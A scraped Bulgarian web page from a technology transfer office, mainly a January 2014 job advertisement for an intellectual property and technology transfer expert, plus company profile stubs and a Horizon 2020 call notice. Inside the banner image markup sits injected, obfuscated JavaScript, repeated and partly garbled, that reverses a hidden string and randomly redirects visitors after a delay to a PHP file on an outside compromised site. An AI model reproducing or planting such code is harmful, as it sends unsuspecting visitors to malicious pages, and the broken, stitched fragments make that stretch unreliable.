ОБЯВА ЗА НАЗНАЧАВАНЕ НА ЕКСПЕРТ ПО ПРОЕКТ BG161PO003-1.2.02 – 0007 – C0001 „ИЗГРАЖДАНЕ И ФУНКЦИОНИРАНЕ НА ОФИС ЗА ТЕХНОЛОГИЧЕН ТРАНСФЕР „ИНОВАТИВЕН КАПИТАЛ””, ФИНАНСИРАН ПО ОПЕРАТИВНА ПРОГРАМА „РАЗВИТИЕ НА КОНКУРЕНТОСПОСОБНОСТТА НА БЪЛГАРСКАТА ИКОНОМИКА” 2007-2013

January 27, 2014 in ОТТ Новини

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.eu/wp-content/uploads/2013/10/346_Baner.png">346_Baner$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sofia.eu/wp-content/uploads/2013/10/346_Baner-1024x271.png" width="670" height="177" />

ДЗЗД „Иновативен капитал” е новосъздаден консорциум, учреден с цел създаване и развиване на офис за технологичен трансфер и е бенефициент по проект BG161PO003-1.2.02 – 0007 – C0001 „Изграждане и функциониране на Офис за технологичен трансфер „Иновативен капитал””, финансиран по Оперативна програма „Развитие на конкурентоспособността на българската икономика” 2007-2013, в рамките на който се публикува настоящата обява за назначаване на експерт на следната позиция:

1 бр. „Експерт, отговарящ за организацията и извършването на тясно специализираните дейности на офиса, в това число дейности по трансфер на технологии”

 

ОСНОВНИ ДЛЪЖНОСТНИ ЗАДЪЛЖЕНИЯ:

 • Отговаря за осъществяване на комуникация и изграждане на комуникационни връзки с изобретатели и млади предприемачи;
 • Извършва оценка на пазарния потенциал на иновативния продукт/услуга;
 • Отговаря за търсене и проучване за потенциални партньори за стартиращи предприятия и предприемачи;
 • Участва в организирането и провеждането на обучения по правни и бизнес теми;
 • Предоставя консултации и подкрепа по отношение на защита на интелектуалната собственост;
 • Участва в провеждането на тръжните процедури;
 • Изпълнява и други конкретно възложени задачи, свърза­ни с длъжността.

Експертът трябва да отговаря на следните основни изисквания:

 • минимум средно образование;
 • опит в сферата на управлението на интелектуалната собственост.

Месторабота: гр. София, ул. „Леге” № 15

Брутно месечно възнаграждение: 846,70 лв.

Ние предлагаме:

 • трудов договор на пълен работен ден;
 • работа в иновативен и динамичен екип;
 • възможност за кариерно развитие.

Крайният срок за подаване на документи за кандидатстване е: 31.01.2014 г. до 16:00 ч.

Документи за кандидатстване се подават на адрес: гр. София, ул. „Леге” № 15

Технест България ЕООД

January 17, 2014 in Профили на компаниите, Технест България ЕООД

Ще Ви бъде позволено да видите информацията, когато влезнете с потребителско име и парола.

Диагностични Системи и Технологии (ДСТ)

January 17, 2014 in Диагностични Системи и Технологии (ДСТ), Профили на компаниите

“Елидо“ АД

January 17, 2014 in Профили на компаниите, “Елидо“ АД

Ще Ви бъде позволено да видите информацията, когато влезнете с потребителско име и парола.

„КЕИТ“ ООД

January 17, 2014 in Профили на компаниите, „КЕИТ“ ООД

Ще Ви бъде позволено да видите информацията, когато влезнете с потребителско име и парола.

Dotterel ABC

January 17, 2014 in Dotterel ABC, Профили на компаниите

Ще Ви бъде позволено да видите информацията, когато влезнете с потребителско име и парола.

Първата покана за набиране на предложения в Сателит Навигацията по Хоризонт 2020 е официално отворенa с бюджет от 38 млн. евро. Крайният срок за подаване на проектните предложения е 03 април 2014 г..

January 17, 2014 in Uncategorized

За повече информация, моля посетете този линк: http://www.gsa.europa.eu/r-d/h2020/introduction .